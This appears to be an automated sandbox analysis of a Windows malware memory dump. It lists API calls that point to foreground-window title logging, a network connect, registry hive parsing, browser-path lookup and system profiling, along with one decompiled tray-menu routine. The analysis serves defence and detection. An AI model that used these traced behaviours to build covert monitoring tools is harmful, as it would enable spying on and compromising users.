                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0041307B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004130B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                                        • String ID:
                                        • API String ID: 3496238640-0
                                        • Opcode ID: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                        • Instruction ID: d45ca6ef39ea3e178db3ab1d94ac08b999b831b850f622e5a8fdf4a981eaba08
                                        • Opcode Fuzzy Hash: 4cce06ad55edbceb2eb1acd16d276c83b26923f47a7b414541e37ea5d0900f90
                                        • Instruction Fuzzy Hash: 02414E32500509DBCB04EFA1DD5A9EE7BB8EF94342B10416AF803A31A0EF745F45CA69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00405423
                                          • Part of subcall function 00412F73: GetForegroundWindow.USER32(?,0041BCB0,?,?,?,?,?,?,?,?,0040542E), ref: 00412F7B
                                          • Part of subcall function 00412F73: GetWindowTextLengthA.USER32(00000000), ref: 00412F84
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040542E), ref: 00412F9D
                                          • Part of subcall function 00412F73: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FA6
                                          • Part of subcall function 00412F73: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FB0
                                          • Part of subcall function 00412F73: GetWindowTextA.USER32 ref: 00412FB8
                                          • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00412FC7
                                          • Part of subcall function 00412F73: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FD1
                                          • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                          • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                          • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                          • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                        • Sleep.KERNEL32(000001F4), ref: 0040543A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                        • Sleep.KERNEL32(00000064), ref: 004054D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                        • String ID: [ $ ]
                                        • API String ID: 3011177377-93608704
                                        • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                        • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                        • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                        • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                        • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                        • _itoa.MSVCRT ref: 0040377A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                        • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                        • String ID:
                                        • API String ID: 3966177967-0
                                        • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                        • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                        • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                        • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				struct tagPOINT _v12;
                                        				void* _t16;
                                        				struct HMENU__* _t17;
                                        				void* _t20;
                                        				void* _t24;
                                        
                                        				_t16 = _a8 - 1;
                                        				if(_t16 == 0) {
                                        					_t17 = CreatePopupMenu();
                                        					 *0x41c1f0 = _t17;
                                        					AppendMenuA(_t17, 0, 0, "Close");
                                        					L15:
                                        					return 0;
                                        				}
                                        				_t20 = _t16 - 0x110;
                                        				if(_t20 == 0) {
                                        					if(_a12 != 0) {
                                        						goto L15;
                                        					}
                                        					Shell_NotifyIconA(2, 0x41c200);
                                        					ExitProcess(0);
                                        				}
                                        				if(_t20 == 0x2f0) {
                                        					_t24 = _a16 - 0x201;
                                        					if(_t24 == 0) {
                                        						if(IsWindowVisible( *0x41c1fc) == 0) {
                                        							ShowWindow( *0x41c1fc, 9);
                                        							SetForegroundWindow( *0x41c1fc);
                                        						} else {
                                        							ShowWindow( *0x41c1fc, 0);
                                        						}
                                        						goto L15;
                                        					}
                                        					if(_t24 == 3) {
                                        						GetCursorPos( &_v12);
                                        						SetForegroundWindow(_a4);
                                        						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
                                        						goto L15;
                                        					}
                                        					_push(_a16);
                                        					_push(_a12);
                                        					_push(0x401);
                                        					L4:
                                        					return DefWindowProcA(_a4, ??, ??, ??);
                                        				}
                                        				_push(_a16);
                                        				_push(_a12);
                                        				_push(_a8);
                                        				goto L4;
                                        			}

                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                        • GetCursorPos.USER32(?), ref: 00413C97
                                        • SetForegroundWindow.USER32(?), ref: 00413CA0
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                        • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                        • ExitProcess.KERNEL32 ref: 00413D14
                                        • CreatePopupMenu.USER32 ref: 00413D1C
                                        • AppendMenuA.USER32 ref: 00413D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                        • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                          • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                          • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                          • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                          • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                          • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                        • String ID: z@
                                        • API String ID: 1937136672-317290069
                                        • Opcode ID: b2e888e36a4149ccbd4d1433f25e5fa503bbd364d31bbff0643b279aff1329be
                                        • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                        • Opcode Fuzzy Hash: b2e888e36a4149ccbd4d1433f25e5fa503bbd364d31bbff0643b279aff1329be
                                        • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                        • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                        • API String ID: 2054586871-62392802
                                        • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                        • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                          • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                          • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                          • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                          • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,69D8CB60,?,?,0041225E,?), ref: 00412919
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                          • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                          • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                        • String ID: .exe$http\shell\open\command
                                        • API String ID: 2647146128-4091164470
                                        • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                        • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                        • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                        • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 2807017801-0
                                        • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                        • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00401EA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
